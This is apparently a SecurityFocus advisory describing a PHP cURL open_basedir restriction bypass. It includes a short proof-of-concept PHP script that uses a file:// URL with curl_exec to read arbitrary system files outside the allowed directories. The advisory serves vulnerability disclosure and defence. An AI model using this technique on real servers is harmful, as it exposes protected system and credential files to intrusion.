PHP cURL Open_Basedir Restriction Bypass Vulnerability

An exploit is not required. An example PHP script containing cURL functions sufficient to read arbitrary files was provided:

<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>


 

Privacy Statement
Copyright 2010, SecurityFocus